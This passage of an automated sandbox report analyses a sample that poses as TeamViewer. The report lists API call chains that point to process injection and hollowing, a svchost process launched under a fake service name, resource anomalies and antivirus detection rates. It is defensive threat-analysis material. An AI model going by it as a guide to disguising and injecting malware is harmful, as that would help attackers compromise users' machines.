dWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,	3_2_6EAF8510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	3_2_6EAF14E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,	3_2_6EAF4EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,	3_2_6EAFB2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	3_2_6EAF2ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF18D0 NtProtectVirtualMemory,	3_2_6EAF18D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFAE20 NtOpenThread,	3_2_6EAFAE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,	3_2_6EAF1C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,	3_2_6EAF2640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,	3_2_6EAF23B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,	3_2_6EAF7790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,	3_2_6EAF19F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFAD39 NtProtectVirtualMemory,	3_2_6EAFAD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFA500 NtQueryVirtualMemory,	3_2_6EAFA500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,	3_2_6EAF2750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	3_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,	6_2_6EAFAFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFADE0 NtProtectVirtualMemory,	6_2_6EAFADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	6_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,	6_2_6EAF7790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,	6_2_6EAF8400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,	6_2_6EAF8510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB270 NtResumeThread,NtClose,HeapFree,	6_2_6EAFB270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,	6_2_6EAFB0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB1F0 NtSuspendThread,NtClose,	6_2_6EAFB1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,	6_2_6EAF4EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	6_2_6EAF2ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFAE20 NtOpenThread,	6_2_6EAFAE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,	6_2_6EAF1C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFAD39 NtProtectVirtualMemory,	6_2_6EAFAD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF18D0 NtProtectVirtualMemory,	6_2_6EAF18D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,	6_2_6EAF19F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,	6_2_6EAF2640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,	6_2_6EAF2750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	6_2_6EAF14E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFA500 NtQueryVirtualMemory,	6_2_6EAFA500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,	6_2_6EAFB2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,	6_2_6EAF23B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,GetComputerNameExW,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,lstrcmp,lstrcmp,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,lstrcmp,lstrcmp,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,	8_2_6EAF8510
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,	8_2_6EAFB0A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	8_2_6EAF14E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,	8_2_6EAF4EF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache,	8_2_6EAFB2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	8_2_6EAF2ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF18D0 NtProtectVirtualMemory,	8_2_6EAF18D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFAE20 NtOpenThread,	8_2_6EAFAE20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,	8_2_6EAF8400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,	8_2_6EAF1C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB270 NtResumeThread,NtClose,HeapFree,	8_2_6EAFB270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,	8_2_6EAF2640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,	8_2_6EAF23B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,	8_2_6EAF7790
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFADE0 NtProtectVirtualMemory,	8_2_6EAFADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,	8_2_6EAF19F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFB1F0 NtSuspendThread,NtClose,	8_2_6EAFB1F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFAFC0 NtGetContextThread,NtSetContextThread,	8_2_6EAFAFC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFAD39 NtProtectVirtualMemory,	8_2_6EAFAD39
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFA500 NtQueryVirtualMemory,	8_2_6EAFA500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,	8_2_6EAF2750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	8_2_6EAF6D50

PE file does not import any functions

Source: Teamviewer_Resource_ja.dll.1.dr

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe

PE file contains strange resources

Source: 77Etc0bR2v.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Contains functionality to delete services

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF3700

Source: 77Etc0bR2v.exe	Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe	ReversingLabs: Detection: 37%

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File read: C:\Users\user\Desktop\77Etc0bR2v.exe

Jump to behavior

Source: 77Etc0bR2v.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

